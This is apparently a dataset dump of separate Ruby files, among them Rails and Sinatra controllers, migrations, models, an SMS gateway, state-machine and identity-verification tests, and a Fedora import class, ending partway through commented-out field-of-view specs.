text stringlengths 10 2.61M |
|---|
require 'benchmark'

# Benchmark-harness configuration; every knob is overridable via an
# environment variable of the same name.

# Warmup iterations (note: warmup times are still appended to the output
# file; downstream processing is presumably expected to drop them — verify).
WARMUP_ITRS = ENV.fetch('WARMUP_ITRS', 15).to_i
# Minimum number of benchmarking iterations
MIN_BENCH_ITRS = ENV.fetch('MIN_BENCH_ITRS', 10).to_i
# Minimum benchmarking time in seconds
MIN_BENCH_TIME = ENV.fetch('MIN_BENCH_TIME', 10).to_i

# Results file defaults to an engine- and timestamp-tagged CSV in the
# current directory, e.g. results-ruby-3.2.0-2024-01-01-120000.csv.
default_path = "results-#{RUBY_ENGINE}-#{RUBY_ENGINE_VERSION}-#{Time.now.strftime('%F-%H%M%S')}.csv"
OUT_CSV_PATH = File.expand_path(ENV.fetch('OUT_CSV_PATH', default_path))

puts RUBY_DESCRIPTION
# Runs the given block repeatedly, timing each iteration.
#
# Executes at least WARMUP_ITRS + MIN_BENCH_ITRS iterations, and keeps
# iterating until MIN_BENCH_TIME seconds of cumulative block time have
# elapsed. Every iteration time (warmup included) is written to
# OUT_CSV_PATH, one value per line, headed by RUBY_DESCRIPTION.
#
# num_itrs_hint - accepted for interface compatibility; currently unused.
#
# Replaces the `begin...end until` do-while idiom (a known Ruby trap) with
# an explicit loop/break, and `and` with `&&` to avoid precedence surprises.
def run_benchmark(num_itrs_hint)
  times = []
  total_time = 0
  num_itrs = 0
  loop do
    time = Benchmark.realtime { yield }
    num_itrs += 1

    # NOTE: we may want to avoid this as it could trigger GC?
    time_ms = (1000 * time).to_i
    puts "itr \##{num_itrs}: #{time_ms}ms"

    # We internally save the time in seconds to avoid loss of precision
    times << time
    total_time += time

    # Do-while semantics: always run at least one iteration before testing.
    break if num_itrs >= WARMUP_ITRS + MIN_BENCH_ITRS && total_time >= MIN_BENCH_TIME
  end

  # Write each time value on its own line
  File.write(OUT_CSV_PATH, "#{RUBY_DESCRIPTION}\n#{times.join("\n")}\n")
end
|
# Sinatra-style controller for account signup, login, and logout.
class UserController < ApplicationController
  # Renders the signup form, or bounces users who are already signed in.
  get '/signup' do
    if user_signed_in?
      flash.next[:greeting] = "Already logged in as #{current_user.username}"
      redirect '/diary-list'
    else
      erb :"users/new"
    end
  end

  # Creates an account after a case-insensitive email/username uniqueness check.
  post '/signup' do
    # Fix: the original block parameter shadowed the outer `user` local.
    # NOTE(review): this loads every user into memory per signup; a scoped
    # case-insensitive query on User would scale better — confirm ORM support.
    taken = User.all.any? do |existing|
      existing.email.downcase == params["email"].downcase ||
        existing.username.downcase == params["username"].downcase
    end
    if taken
      flash.next[:error] = "Email or Username is already taken"
      redirect "/signup"
    else
      # NOTE(review): params is passed through unfiltered (mass assignment);
      # consider whitelisting the attributes User actually accepts.
      user = User.new(params)
      if user.save
        session[:user_id] = user.id
        flash.next[:greeting] = "Welcome, #{user.username}"
        redirect '/diary-list'
      else
        flash.next[:error] = "Username, email, and password are required to create an account."
        redirect '/signup'
      end
    end
  end

  # Renders the login form, or bounces users who are already signed in.
  get '/login' do
    if user_signed_in?
      flash.next[:greeting] = "Already logged in as #{current_user.username}"
      redirect '/diary-list'
    else
      erb :"users/login"
    end
  end

  # Authenticates by username/password and stores the user id in the session.
  post '/login' do
    user = User.find_by(:username => params["username"])
    if user && user.authenticate(params["password"])
      session[:user_id] = user.id
      flash.next[:greeting] = "Welcome back, #{user.username}"
      redirect "/diary-list"
    else
      flash.next[:error] = "Login Failed. Please Try Again."
      redirect "/login"
    end
  end

  # Clears the session; tells the user whether they were logged in at all.
  get '/logout' do
    if user_signed_in?
      session.clear
      flash.next[:greeting] = "You've been logged out"
      redirect '/'
    else
      flash.next[:greeting] = "You were not logged in"
      redirect '/'
    end
  end
end
|
##
# Kernel
#
# ISO 15.3.1
module Kernel
  ##
  # Print human readable object description
  #
  # Writes each argument's #inspect representation followed by a newline
  # using the interpreter-provided __printstr__ primitive (mruby-style
  # core library, so no Enumerable helpers are assumed here).
  #
  # Returns args.__svalue — the conventional Kernel#p return value
  # (presumably: nil for no args, the object for one arg, the array for
  # several — verify against Array#__svalue).
  #
  # ISO 15.3.1.2.9
  # ISO 15.3.1.3.34
  def p(*args)
    i = 0
    len = args.size
    # Plain while loop: core-library code avoids allocating enumerators.
    while i < len
      __printstr__ args[i].inspect
      __printstr__ "\n"
      i += 1
    end
    args.__svalue
  end

  ##
  # Formats *args with Kernel#sprintf, prints the result, returns nil.
  def printf(*args)
    __printstr__(sprintf(*args))
    nil
  end
end
|
require 'faraday'
module Pling
  module Mobilant
    # Pling gateway that delivers SMS messages through the Mobilant HTTP API.
    class Gateway < ::Pling::Gateway
      handles :sms, :mobilant, :mobile

      # configuration - Hash of gateway settings; :key (API key) is mandatory.
      def initialize(configuration)
        super
        require_configuration([:key])
      end

      # Delivers the message body to the device identifier via HTTP GET.
      # Raises the error mapped from Mobilant's response code on failure;
      # returns nil on success.
      def deliver!(message, device)
        # Required query parameters.
        query = {}
        query[:message] = message.body
        query[:to] = sanitize_identifier(device.identifier)
        query[:route] = route
        query[:key] = configuration[:key]
        query[:charset] = configuration[:charset] if configuration[:charset]
        # Optional query parameters.
        query[:from] = source if source
        query[:debug] = debug if debug

        response = connection.get do |request|
          request.url(configuration[:delivery_url], query)
        end

        # Mobilant reports its status as the first line of the body.
        status_code = response.body.lines.first
        delivery_error = ::Pling::Mobilant.error_by_response_code(status_code)
        raise delivery_error if delivery_error
        nil
      end

      private

      def default_configuration
        super.merge(
          :delivery_url => 'https://gw.mobilant.net/',
          :adapter => :net_http,
          :connection => {},
          :route => :lowcost
        )
      end

      # Lazily-built Faraday connection; logs responses when :debug is set.
      def connection
        @connection ||= Faraday.new(configuration[:connection]) do |faraday|
          faraday.use Faraday::Request::UrlEncoded
          faraday.use Faraday::Response::Logger if configuration[:debug]
          faraday.adapter(configuration[:adapter])
        end
      end

      # Validates the configured route against the routes Mobilant accepts.
      def route
        chosen = configuration[:route] || :lowcost
        unless [:lowcost, :lowcostplus, :direct, :directplus].include?(chosen)
          raise(::Pling::Mobilant::InvalidRoute, "Invalid route")
        end
        chosen
      end

      # Mobilant expects debug as the literal 1; omitted entirely otherwise.
      def debug
        configuration[:debug] ? 1 : nil
      end

      # Optional sender id, whitespace-stripped.
      def source
        return nil unless configuration[:source]
        configuration[:source].to_s.strip
      end

      # Converts a leading "+" to "00" and drops every non-digit character.
      def sanitize_identifier(identifier)
        identifier.gsub(/^\+/, "00").gsub(/\D/, '')
      end
    end
  end
end
|
# frozen_string_literal: true
# ActionCable channel that tracks user presence ("appearance") via Redis
# flags and broadcasts online/offline changes through a background job.
class AppearancesChannel < ApplicationCable::Channel
  # Flags the current user online, subscribes to the shared appearances
  # stream, and broadcasts the "online" status change.
  def subscribed
    redis.set("user_#{current_user.slug}_online", '1')
    stream_from('appearances_channel')
    AppearanceBroadcastJob.perform_later(current_user.slug, true)
  end

  # Clears the online flag and broadcasts the "offline" status change.
  def unsubscribed
    redis.del("user_#{current_user.slug}_online")
    AppearanceBroadcastJob.perform_later(current_user.slug, false)
  end

  private

  # Memoized Redis client. The original constructed a brand-new Redis
  # connection on every call, churning sockets under load; one connection
  # per channel instance is sufficient here.
  def redis
    @redis ||= Redis.new
  end
end
|
# == Schema Information
#
# Table name: reviews
#
# id :integer not null, primary key
# rating :integer
# content :text
# created_at :datetime not null
# updated_at :datetime not null
# movie_id :integer
#
# A review of a movie; the star rating must fall within 1..5.
class Review < ActiveRecord::Base
  belongs_to :movie

  validates :rating, inclusion: { in: 1..5 }
end
|
# frozen_string_literal: true
module Decidim
  module Opinions
    module Admin
      # A command with all the business logic when an admin merges opinions
      # from one component to another.
      class MergeOpinions < Rectify::Command
        # form - A form object carrying the opinions to merge plus the
        #        target component, organization, and acting user.
        def initialize(form)
          @form = form
        end

        # Executes the command. Broadcasts:
        #
        # - :ok (with the merged opinion) when everything is valid.
        # - :invalid if the form wasn't valid and we couldn't proceed.
        def call
          return broadcast(:invalid) unless form.valid?

          broadcast(:ok, merge_opinions)
        end

        private

        attr_reader :form

        # Builds the merged opinion inside a transaction, wires up its
        # resource links, and destroys the originals when merging within
        # the same component.
        def merge_opinions
          transaction do
            merged = create_new_opinion
            merged.link_resources(opinions_to_link, "copied_from_component")
            form.opinions.each(&:destroy!) if form.same_component?
            merged
          end
        end

        # Same-component merges inherit the originals' existing links;
        # cross-component merges link straight to the source opinions.
        def opinions_to_link
          form.same_component? ? previous_links : form.opinions
        end

        def previous_links
          @previous_links ||= form.opinions.flat_map do |opinion|
            opinion.linked_resources(:opinions, "copied_from_component")
          end
        end

        # Copies the first source opinion into the target component,
        # authored by the organization; linking is deferred to the caller.
        def create_new_opinion
          Decidim::Opinions::OpinionBuilder.copy(
            form.opinions.first,
            author: form.current_organization,
            action_user: form.current_user,
            extra_attributes: { component: form.target_component },
            skip_link: true
          )
        end
      end
    end
  end
end
|
# A news section (e.g. a Yahoo News category) holding scraped articles.
class NewsReader::Section
  attr_accessor :name, :url

  # Registry of every Section instantiated so far.
  # NOTE(review): @@all is a class variable shared across subclasses;
  # acceptable for this CLI pattern, but a class instance variable is safer.
  @@all = []

  # section_hash - Hash of attribute name => value; each key is assigned
  # via its writer (unknown keys raise NoMethodError). Every new section
  # self-registers in the class-level registry.
  def initialize(section_hash)
    @articles = []
    section_hash.each { |key, value| send("#{key}=", value) }
    @@all << self
  end

  def self.all
    @@all
  end

  # Adds an article after type-checking it.
  def add_article(article)
    raise "invalid article" unless article.is_a?(NewsReader::Article)
    @articles << article
  end

  # Frozen copy so callers cannot mutate the internal collection.
  def articles
    @articles.dup.freeze
  end

  # Scrapes the section list once. Scraped sections self-register through
  # #initialize, so the scraper's return value need not be captured
  # (the original assigned it to an unused local).
  def self.fetch_sections
    if all.empty?
      home_url = "https://news.yahoo.com/"
      NewsReader::Scraper.scrape_sections(home_url)
    end
  end

  # Lazily scrapes this section's articles on first access.
  def fetch_articles
    NewsReader::Scraper.scrape_section_page(self) if articles.empty?
  end
end
|
# Creates the polymorphic "cookies" table (owner_type/owner_id) used to
# store per-owner text blobs with an optional expiry.
class AddCookies < ActiveRecord::Migration
  def self.up
    create_table "cookies" do |t|
      t.string   "owner_type", :null => false
      t.integer  "owner_id",   :null => false
      t.string   "text",       :null => false
      t.datetime "created_at", :null => false
      t.string   "usage",      :null => false
      t.datetime "expires_at"
    end
  end

  def self.down
    drop_table "cookies"
  end
end
|
# Shared examples verifying identity-verification (IdV) attempt throttling:
# users get a limited number of attempts per 24-hour window, after which the
# session and phone steps hard-fail with a flash/modal message.
shared_examples 'idv max step attempts' do |sp|
  it 'allows 3 attempts in 24 hours', :email do
    visit_idp_from_sp_with_loa3(sp)
    user = register_user
    # Burn all but the final allowed attempt.
    max_attempts_less_one.times do
      visit verify_session_path
      fill_out_idv_form_fail
      click_idv_continue
      expect(current_path).to eq verify_session_result_path
    end
    user.reload
    expect(user.idv_attempted_at).to_not be_nil
    # The last attempt trips the hard-fail modal.
    fill_out_idv_form_fail
    click_idv_continue
    expect(page).to have_css('.alert-error', text: t('idv.modal.sessions.heading'))
    # Re-entering from the SP shows the hard-fail message with the window length.
    visit_idp_from_sp_with_loa3(sp)
    expect(page).to have_content(
      t('idv.messages.hardfail', hours: Figaro.env.idv_attempt_window_in_hours)
    )
    expect(current_url).to eq verify_fail_url
    # Navigating straight back to the session step stays on the fail page.
    visit verify_session_path
    expect(page).to have_content(t('idv.errors.hardfail'))
    expect(current_url).to eq verify_fail_url
    user.reload
    expect(user.idv_attempted_at).to_not be_nil
  end

  scenario 'profile shows failure flash message after max attempts', :email do
    visit_idp_from_sp_with_loa3(sp)
    register_user
    click_idv_begin
    max_attempts_less_one.times do
      fill_out_idv_form_fail
      click_idv_continue
      expect(current_path).to eq verify_session_result_path
    end
    # Final failed attempt surfaces the sessions modal.
    fill_out_idv_form_fail
    click_idv_continue
    expect(page).to have_css('.alert-error', text: t('idv.modal.sessions.heading'))
    expect(current_path).to eq verify_session_result_path
  end

  scenario 'phone shows failure flash after max attempts', :email do
    visit_idp_from_sp_with_loa3(sp)
    register_user
    click_idv_begin
    # Pass the session step so we can exercise the phone step's limit.
    fill_out_idv_form_ok
    click_idv_continue
    click_idv_address_choose_phone
    max_attempts_less_one.times do
      fill_out_phone_form_fail
      click_idv_continue
      expect(current_path).to eq verify_phone_result_path
    end
    # Final failed attempt surfaces the phone modal.
    fill_out_phone_form_fail
    click_idv_continue
    expect(page).to have_css('.alert-error', text: t('idv.modal.phone.heading'))
    expect(current_path).to eq verify_phone_result_path
  end
end
|
# JSON API for songs nested under playlists.
class Api::V1::SongsController < ApplicationController
  before_action :set_song, only: [:show, :update, :destroy]

  # GET — lists all songs belonging to the given playlist.
  def index
    @songs = Song.where(:playlist_id => params[:playlist_id])
    json_response(object: @songs)
  end

  # POST — creates a song and responds 201.
  #
  # Fixes from review: the original had a SyntaxError (missing comma after
  # the :genre argument), passed each param individually instead of using
  # the song_params whitelist, and wrapped the result in a dead `if @song`
  # check (create! raises on failure, so @song is always truthy here).
  def create
    @song = Song.create!(song_params)
    json_response(object: @song, message: "song saved!", status: :created)
  end

  # GET — shows one song (loaded by set_song).
  def show
    json_response(object: @song)
  end

  # PATCH/PUT — updates the song with the whitelisted attributes.
  def update
    @song.update(song_params)
    json_response(object: @song)
  end

  # DELETE — removes the song; responds 204 with no body.
  def destroy
    @song.destroy
    head :no_content
  end

  private

  # Loads the song or raises ActiveRecord::RecordNotFound (find_by! on id).
  def set_song
    @song = Song.find_by!(id: params[:id])
  end

  # Strong-parameters whitelist shared by create and update.
  def song_params
    params.permit(:title, :artist, :genre, :playlist_id)
  end
end
# Switches concerts.conductor_id to an integer column.
class ChangeDatatypeConductorIdOfConcerts < ActiveRecord::Migration
  # NOTE(review): change_column is not automatically reversible, so rolling
  # this migration back raises ActiveRecord::IrreversibleMigration. Consider
  # explicit up/down methods — the previous column type is not visible here,
  # so it cannot be reconstructed in this review.
  def change
    change_column :concerts, :conductor_id, :integer
  end
end
|
# Creates the restaurants table: descriptive fields, contact details,
# pricing, and three sustainability feature flags.
class CreateRestaurants < ActiveRecord::Migration[5.1]
  def change
    create_table :restaurants do |t|
      t.column :name, :string
      t.column :cuisine, :string
      t.column :description, :text
      t.column :location, :string
      t.column :address, :string
      t.column :phone_number, :string
      t.column :price_for_two, :integer
      t.column :working_hours, :string
      t.column :has_community, :boolean
      t.column :has_sourcing, :boolean
      t.column :has_recycling, :boolean
      t.column :photos, :string

      t.timestamps
    end
  end
end
|
require 'helper'
class ActiveRecordTest < Minitest::Test
class PostStates < StateManager::Base
attr_accessor :before_callbacks_called
attr_accessor :after_callbacks_called
state :unsubmitted do
event :submit, :transitions_to => 'submitted.awaiting_review'
event :activate, :transitions_to => 'active'
end
state :submitted do
state :awaiting_review do
event :review, :transitions_to => 'submitted.reviewing'
end
state :reviewing do
event :accept, :transitions_to => 'active'
event :clarify, :transitions_to => 'submitted.clarifying'
end
state :clarifying do
event :review, :transitions_to => 'submitted.reviewing'
end
end
state :active
state :rejected
state :mutated
attr_accessor :unsubmitted_entered_count
attr_accessor :unsubmitted_enter_committed_count
attr_accessor :unsubmitted_exit_committed_count
attr_accessor :active_entered_count
attr_accessor :active_enter_committed_count
attr_accessor :active_exit_committed_count
def initialize(*args)
super
@unsubmitted_entered_count = 0
@unsubmitted_enter_committed_count = 0
@unsubmitted_exit_committed_count = 0
@active_entered_count = 0
@active_enter_committed_count = 0
@active_exit_committed_count =0
end
def will_transition(*args)
self.before_callbacks_called = true
end
def did_transition(*args)
self.after_callbacks_called = true
end
class Unsubmitted
def entered
state_manager.unsubmitted_entered_count += 1
end
def enter_committed
state_manager.unsubmitted_enter_committed_count += 1
end
def exit_committed
state_manager.unsubmitted_exit_committed_count += 1
end
end
class Active
def entered
state_manager.active_entered_count += 1
end
def enter_committed
state_manager.active_enter_committed_count += 1
end
def exit_committed
state_manager.active_exit_committed_count += 1
end
end
class Mutated
def entered
self.title = 'mutant'
save
end
end
end
class Post < ActiveRecord::Base
extend StateManager::Resource
state_manager
end
def exec(sql)
ActiveRecord::Base.connection.execute sql
end
def setup
ActiveRecord::Base.establish_connection(
:adapter => "sqlite3",
:database => ":memory:" #"tmp/test"
)
ActiveRecord::Schema.define do
create_table :posts do |t|
t.string :title
t.string :body
t.string :state
end
end
exec "INSERT INTO posts VALUES(1, NULL, NULL, NULL)"
exec "INSERT INTO posts VALUES(2, NULL, NULL, 'unsubmitted')"
exec "INSERT INTO posts VALUES(3, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(4, NULL, NULL, 'submitted.bad_state')"
@resource = nil
DatabaseCleaner.start
end
def teardown
DatabaseCleaner.clean
ActiveRecord::Base.connection.disconnect!
end
def test_adapter_included
@resource = Post.find(1)
assert @resource.is_a?(StateManager::Adapters::ActiveRecord::ResourceMethods)
assert @resource.state_manager.is_a?(StateManager::Adapters::ActiveRecord::ManagerMethods)
end
def test_persist_initial_state
@resource = Post.find(1)
assert_state 'unsubmitted'
assert !@resource.state_manager.before_callbacks_called
assert !@resource.state_manager.after_callbacks_called
assert @resource.changed?, "state should not have been persisted"
@resource.transaction do
@resource.save
assert @resource.state_manager.before_callbacks_called
assert @resource.state_manager.after_callbacks_called
end
end
def test_initial_state_value
@resource = Post.find(3)
assert_state 'submitted.reviewing'
end
def test_validate_nil_state
@resource = Post.find(1)
assert !@resource.state
@resource.save
assert_state 'unsubmitted'
end
def test_validate_invalid_state
@resource = Post.find(4)
assert_equal 'submitted.bad_state', @resource.state
@resource.save
assert_state 'unsubmitted'
end
def test_new_record
@resource = Post.new
assert_state 'unsubmitted'
assert @resource.new_record?, 'record should not have been persisted'
@resource.save
@resource.submit!
assert_state 'submitted.awaiting_review'
assert !@resource.new_record?, 'record should be persisted'
end
def test_scopes
exec "INSERT INTO posts VALUES(5, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(6, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(7, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(8, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(9, NULL, NULL, 'submitted.clarifying')"
exec "INSERT INTO posts VALUES(10, NULL, NULL, 'submitted.clarifying')"
exec "INSERT INTO posts VALUES(11, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(12, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(13, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(14, NULL, NULL, 'active')"
# +1 from setup
assert_equal 1, Post.unsubmitted.count
# +1 from setup (one is in a bad state)
assert_equal 7, Post.submitted.count
assert_equal 4, Post.active.count
assert_equal 0, Post.rejected.count
end
def test_multiple_transitions
@resource = Post.find(2)
@resource.submit!
assert_state 'submitted.awaiting_review'
@resource.review!
assert_state 'submitted.reviewing'
end
def test_dirty_transition
@resource = Post.find(2)
@resource.state_manager.send_event :submit
assert_state 'submitted.awaiting_review'
assert_raises(StateManager::Adapters::ActiveRecord::DirtyTransition) do
@resource.state_manager.send_event :review
end
end
def test_commit_callbacks
@resource = Post.find(1)
assert_state 'unsubmitted'
assert !@resource.state_manager.before_callbacks_called
assert !@resource.state_manager.after_callbacks_called
assert @resource.changed?, "state should not have been persisted"
@resource.transaction do
@resource.save!
assert @resource.state_manager.before_callbacks_called
assert @resource.state_manager.after_callbacks_called
assert_equal @resource.state_manager.unsubmitted_enter_committed_count, 0
@resource.activate!
assert_equal @resource.state_manager.unsubmitted_exit_committed_count, 0
assert_equal @resource.state_manager.active_enter_committed_count, 0
end
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
assert_equal 1, @resource.state_manager.unsubmitted_exit_committed_count
assert_equal 1, @resource.state_manager.active_enter_committed_count
@resource.title = 'blah'
@resource.save!
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
assert_equal 1, @resource.state_manager.unsubmitted_exit_committed_count
assert_equal 1, @resource.state_manager.active_enter_committed_count
end
def test_commit_callbacks_on_create
Post.transaction do
@resource = Post.new
assert !@resource.state_manager.after_callbacks_called
@resource.save
assert @resource.state_manager.after_callbacks_called
assert_equal 1, @resource.state_manager.unsubmitted_entered_count
assert_equal 0, @resource.state_manager.unsubmitted_enter_committed_count
end
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
end
def test_commit_callbacks_on_different_initial_state
Post.transaction do
@resource = Post.new(:state => 'active')
assert !@resource.state_manager.after_callbacks_called
@resource.save
assert @resource.state_manager.after_callbacks_called
end
assert_equal @resource.state_manager.unsubmitted_entered_count, 0
assert_equal @resource.state_manager.active_entered_count, 1
assert_equal @resource.state_manager.active_enter_committed_count, 1
end
def test_save_in_entered_callback
@resource = Post.new(:state => 'mutated')
@resource.save
assert_equal 'mutant', @resource.title
end
end
|
require 'import/dc_parser'
require 'import/legacy_object'
require 'import/rels_ext_parser'
# Raised when an import target PID already exists in the repository.
class PidAlreadyInUseError < StandardError
end
class ObjectFactory
  # Used by the ObjectImporter to select the right class for
  # importing a fedora object.
  # This code relies on assumptions about how the fedora data
  # looks in Digital Case 1.0 (the source fedora that we will
  # import objects from).
  # For example, in Digital Case 1.0 there are some objects
  # with a datastream that has a dsid called "VIDEO" and has
  # a controlGroup of "R" or "E". When we import that object,
  # we are assuming that the object's class should be Video
  # and that the dsLocation of the "VIDEO" datastream should
  # become the url for a LinkedResource that is associated with
  # that new Video object.

  # source_object - the legacy fedora object; must respond to #datastreams
  # (a dsid => datastream hash) and #pid.
  def initialize(source_object)
    @source_object = source_object
  end

  # Initialize a new object with attributes from the source
  # object's DC datastream. The type of work that will be
  # returned will be decided by examining the @source_object.
  #
  # Returns [object_class, populated_object].
  def build_object
    validate_datastreams!
    attrs = DcParser.from_xml(@source_object.datastreams['DC'].content).to_h
    obj = LegacyObject.new(attrs)
    obj.pid = set_pid
    obj.visibility = visibility
    return object_class, obj
  end

  # Imported objects are always public.
  def visibility
    Hydra::AccessControls::AccessRight::VISIBILITY_TEXT_VALUE_PUBLIC
  end

  # Raises if two datastream ids collapse to the same name once
  # case and a trailing ".XML" suffix are normalized away.
  def validate_datastreams!
    datastreams = @source_object.datastreams
    uniq_datastreams = datastreams.keys.map(&:upcase).map { |f| f.sub(/\.XML/, '') }.uniq
    raise "Datastreams are not unique for #{@source_object.pid}" unless uniq_datastreams.size == datastreams.size
  end

  # Returns the source PID, raising if it already exists in the target repo.
  def set_pid
    if ActiveFedora::Base.exists?(@source_object.pid)
      raise PidAlreadyInUseError
    end
    @source_object.pid
  end

  # Decision table mapping datastream evidence to a work class.
  # Order matters: collections win, then video, audio, TEI, image, PDF,
  # external links; anything unrecognized defaults to Text.
  def object_class
    if collection?
      Collection
    elsif video? or has_links_to_video?
      Video
    elsif audio?
      Audio
    elsif has_tei?
      Text
    elsif image?
      Image
    elsif has_pdf?
      Text
    elsif has_external_video_link?
      Video
    elsif has_external_article_link?
      Text
    else
      Text
    end
  end

  # Memoized list of the distinct, non-nil mime types across all datastreams.
  def mime_types
    return @mime_types if @mime_types
    @mime_types = []
    @source_object.datastreams.keys.each do |dsid|
      @mime_types << @source_object.datastreams[dsid].mimeType
    end
    @mime_types = @mime_types.compact.uniq
  end

  # Memoized member ids parsed from the RELS-EXT datastream.
  #
  # BUG FIX: the original returned the value of the trailing `if`
  # expression, which is nil when there is no RELS-EXT datastream —
  # making collection? crash with NoMethodError on nil. Always return
  # the (possibly empty) array.
  def member_ids
    return @member_ids if @member_ids
    @member_ids = []
    if @source_object.datastreams['RELS-EXT']
      rels = @source_object.datastreams['RELS-EXT'].content
      @member_ids = RelsExtParser.new(rels).collection_member_ids
    end
    @member_ids
  end

  def collection?
    !member_ids.empty?
  end

  def video?
    video_types = ['video/mpeg', 'video/mp4']
    mime_types.any? { |mime_type| video_types.include?(mime_type) }
  end

  def audio?
    audio_types = ['audio/x-wav', 'audio/mpeg']
    mime_types.any? { |mime_type| audio_types.include?(mime_type) }
  end

  def has_tei?
    tei_dsids = ['tei', 'teip5', 'tei.xml', 'teip5.xml']
    @source_object.datastreams.keys.any? { |dsid|
      tei_dsids.include?(dsid.downcase)
    }
  end

  # True when any datastream id carries a known image file extension.
  def image?
    image_extensions = ['tif', 'gif', 'jp2', 'jpg']
    @source_object.datastreams.keys.any? { |dsid|
      file_extension = dsid.match(/^.*\.(.*)$/)
      file_extension = file_extension[1] if file_extension
      file_extension = file_extension.downcase if file_extension
      image_extensions.include?(file_extension)
    }
  end

  def has_pdf?
    pdf_types = ['application/pdf']
    mime_types.any? { |mime_type| pdf_types.include?(mime_type) }
  end

  def has_external_video_link?
    dsids_for_videos = ['video']
    has_external_link_for?(dsids_for_videos)
  end

  def has_external_article_link?
    dsids_for_texts = ['article']
    has_external_link_for?(dsids_for_texts)
  end

  # True when a datastream named in special_dsids (case-insensitive) has
  # an external ("E") or redirect ("R") control group.
  def has_external_link_for?(special_dsids)
    @source_object.datastreams.keys.any? { |dsid|
      has_matching_dsid = special_dsids.map(&:downcase).include?(dsid.downcase)
      ds = @source_object.datastreams[dsid]
      has_matching_dsid && (ds.external? || ds.redirect?)
    }
  end

  # Load items that have a link to youtube as video instead of text
  def has_links_to_video?
    @source_object.datastreams.keys.any? { |dsid|
      has_link_dsid = ["link"].map(&:downcase).include?(dsid.downcase)
      ds = @source_object.datastreams[dsid]
      has_link_dsid && (ds.dsLocation.include? "youtube.com")
    }
  end
end
|
# require "for_test_helper"
# describe "FOV" do
# MAP8_RING0 = [
# "#####",
# "#####",
# "##@##",
# "#####",
# "#####"
# ]
# RESULT_MAP8_RING0 = [
# " ",
# " ... ",
# " ... ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_90_NORTH = [
# " ",
# " ... ",
# " . ",
# " ",
# " "
# ]
# RESULT_MAP8_RING0_90_SOUTH = [
# " ",
# " ",
# " . ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_90_EAST = [
# " ",
# " . ",
# " .. ",
# " . ",
# " "
# ]
# RESULT_MAP8_RING0_90_WEST = [
# " ",
# " . ",
# " .. ",
# " . ",
# " "
# ]
# RESULT_MAP8_RING0_180_NORTH = [
# " ",
# " ... ",
# " ... ",
# " ",
# " "
# ]
# RESULT_MAP8_RING0_180_SOUTH = [
# " ",
# " ",
# " ... ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_180_EAST = [
# " ",
# " .. ",
# " .. ",
# " .. ",
# " "
# ]
# RESULT_MAP8_RING0_180_WEST = [
# " ",
# " .. ",
# " .. ",
# " .. ",
# " "
# ]
# MAP8_RING1 = [
# "#####",
# "#...#",
# "#.@.#",
# "#...#",
# "#####"
# ]
# RESULT_MAP8_RING1 = [
# ".....",
# ".....",
# ".....",
# ".....",
# "....."
# ]
# describe "Discrete Shadowcasting" do
# describe "8-topology" do
# it "should compute visible ring0" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.DiscreteShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.DiscreteShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# end
# describe "Precise Shadowcasting" do
# describe "8-topology" do
# it "should compute visible ring0" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.PreciseShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.PreciseShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# end
# describe "Recursive Shadowcasting" do
# describe "8-topology" do
# describe "360-degree view" do
# it "should compute visible ring0 in 360 degrees" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1 in 360 degrees" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# describe "180-degree view" do
# it "should compute visible ring0 180 degrees facing north" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 0, lightPasses.center, RESULT_MAP8_RING0_180_NORTH)
# end
# it "should compute visible ring0 180 degrees facing south" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 4, lightPasses.center, RESULT_MAP8_RING0_180_SOUTH)
# end
# it "should compute visible ring0 180 degrees facing east" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 2, lightPasses.center, RESULT_MAP8_RING0_180_EAST)
# end
# it "should compute visible ring0 180 degrees facing west" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 6, lightPasses.center, RESULT_MAP8_RING0_180_WEST)
# end
# end
# describe "90-degree view" do
# it "should compute visible ring0 90 degrees facing north" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
